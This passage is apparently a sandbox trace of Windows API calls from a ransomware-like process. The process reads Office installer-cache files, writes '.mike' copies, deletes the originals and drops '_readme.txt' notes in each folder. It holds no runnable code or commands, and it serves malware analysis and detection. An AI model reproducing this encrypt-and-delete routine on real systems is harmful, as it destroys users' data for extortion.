lpBuffer=0x2163ba0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2163ba0*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.633] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.633] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.633] GetFileType (hFile=0x264) returned 0x1 [0041.633] GetFileType (hFile=0x264) returned 0x1 [0041.633] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x5a220 [0041.633] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.633] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.633] GetFileType (hFile=0x264) returned 0x1 [0041.633] GetFileType (hFile=0x264) returned 0x1 [0041.633] ReadFile (in: hFile=0x264, lpBuffer=0x2170bac, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2170bac*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.635] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.635] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.635] GetFileType (hFile=0x264) returned 0x1 [0041.635] GetFileType (hFile=0x264) returned 0x1 [0041.635] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x5ca20 [0041.635] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.635] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.635] GetFileType (hFile=0x264) returned 0x1 [0041.635] GetFileType (hFile=0x264) returned 0x1 [0041.635] ReadFile (in: hFile=0x264, lpBuffer=0x217dbb8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x217dbb8*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.637] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.637] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.637] GetFileType (hFile=0x264) returned 0x1 [0041.637] GetFileType (hFile=0x264) returned 0x1 [0041.637] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x5f220 [0041.639] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.640] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.640] GetFileType (hFile=0x264) returned 0x1 [0041.640] GetFileType (hFile=0x264) returned 0x1 [0041.640] ReadFile (in: hFile=0x264, lpBuffer=0x218abc4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x218abc4*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0041.641] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.641] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0041.641] GetFileType (hFile=0x264) returned 0x1 [0041.641] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.643] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.695] WriteFile (in: hFile=0x264, lpBuffer=0x228b6a8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x228b6a8*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0041.695] CloseHandle (hObject=0x264) returned 1 [0041.700] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.700] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.700] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0041.700] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2ef0820, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2ef0820, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe30dfa00, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x91ba0)) returned 1 [0041.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0041.700] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.700] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike", lpFilePart=0x0) returned 0x5d [0041.700] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0041.700] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.mike" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x228cf34 | out: lpFileInformation=0x228cf34*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2ef0820, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2ef0820, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe30dfa00, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x91ba0)) returned 1 [0041.700] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0041.700] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.701] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", dwFileAttributes=0x80) returned 1 [0041.701] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aece0, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.701] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml")) returned 1 [0041.706] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.706] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0041.706] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.706] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0041.706] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml", lpFilePart=0x0) returned 0x58 [0041.706] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\_readme.txt", nBufferLength=0x105, lpBuffer=0x2aeb74, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\_readme.txt", lpFilePart=0x0) returned 0x57 [0041.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af068) returned 1 [0041.707] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\_readme.txt" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x264 [0041.707] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af064) returned 1 [0041.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1ec) returned 1 [0041.709] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe2ef0820, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3105b60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.709] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa623330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x266a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUI.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0041.709] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2e7e400, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2e7e400, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe2e7e400, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x770, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccessMUI.xml.mike", cAlternateFileName="ACCESS~1.MIK")) returned 1 [0041.709] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3216e900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3216e900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa64a430, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1ab7e94, dwReserved0=0x0, dwReserved1=0x0, cFileName="AccLR.cab", cAlternateFileName="")) returned 1 [0041.709] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2ef0820, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2ef0820, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe30dfa00, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x91ba0, dwReserved0=0x0, dwReserved1=0x0, cFileName="branding.xml.mike", cAlternateFileName="BRANDI~1.MIK")) returned 1 [0041.709] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2e7e400, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2e7e400, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3105b60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0041.710] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef24 | out: lpFindFileData=0x2aef24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe2e7e400, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe2e7e400, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe3105b60, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x0, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0041.710] FindClose (in: hFindFile=0x4d0ba0 | out: hFindFile=0x4d0ba0) returned 1 [0041.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0041.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1b8) returned 1 [0041.710] CoTaskMemAlloc (cb=0x20c) returned 0x4fe370 [0041.710] GetSystemDirectoryW (in: lpBuffer=0x4fe370, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0041.710] CoTaskMemFree (pv=0x4fe370) [0041.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af234) returned 1 [0041.710] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2aef5c | out: lpFindFileData=0x2aef5c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d0ba0 [0041.712] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.712] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x34ae1a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x34ae1a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe0c2860, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1e6600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0041.712] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x940c2a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x940c2a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xfe09b760, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office32WW.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0041.712] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf885a000, ftCreationTime.dwHighDateTime=0x1cac4d7, ftLastAccessTime.dwLowDateTime=0xf885a000, ftLastAccessTime.dwHighDateTime=0x1cac4d7, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x2a968, dwReserved0=0x0, dwReserved1=0x0, cFileName="ose.exe", cAlternateFileName="")) returned 1 [0041.712] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd900f00, ftCreationTime.dwHighDateTime=0x1cac15b, ftLastAccessTime.dwLowDateTime=0xbd900f00, ftLastAccessTime.dwHighDateTime=0x1cac15b, ftLastWriteTime.dwLowDateTime=0x16854390, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x709768, dwReserved0=0x0, dwReserved1=0x0, cFileName="osetup.dll", cAlternateFileName="")) returned 1 [0041.712] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x147e5b00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x147e5b00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xff654fc0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x228df5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="OWOW32WW.cab", cAlternateFileName="")) returned 1 [0041.712] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3a02e00, ftCreationTime.dwHighDateTime=0x1cac5f7, ftLastAccessTime.dwLowDateTime=0xe3a02e00, ftLastAccessTime.dwHighDateTime=0x1cac5f7, ftLastWriteTime.dwLowDateTime=0x17e0dbf0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0x0, dwReserved1=0x0, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0041.713] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe06a9500, ftCreationTime.dwHighDateTime=0x1cac7e5, ftLastAccessTime.dwLowDateTime=0xe06a9500, ftLastAccessTime.dwHighDateTime=0x1cac7e5, ftLastWriteTime.dwLowDateTime=0x17c42c30, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0x0, dwReserved1=0x0, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0041.713] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbb2e2000, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbb2e2000, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x1a41c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProPlusrWW.msi", cAlternateFileName="PROPLU~1.MSI")) returned 1 [0041.713] FindNextFileW (in: hFindFile=0x4d0ba0, lpFindFileData=0x2aef6c | out: lpFindFileData=0x2aef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0x170fe40, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x41d4, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProPlusrWW.xml", 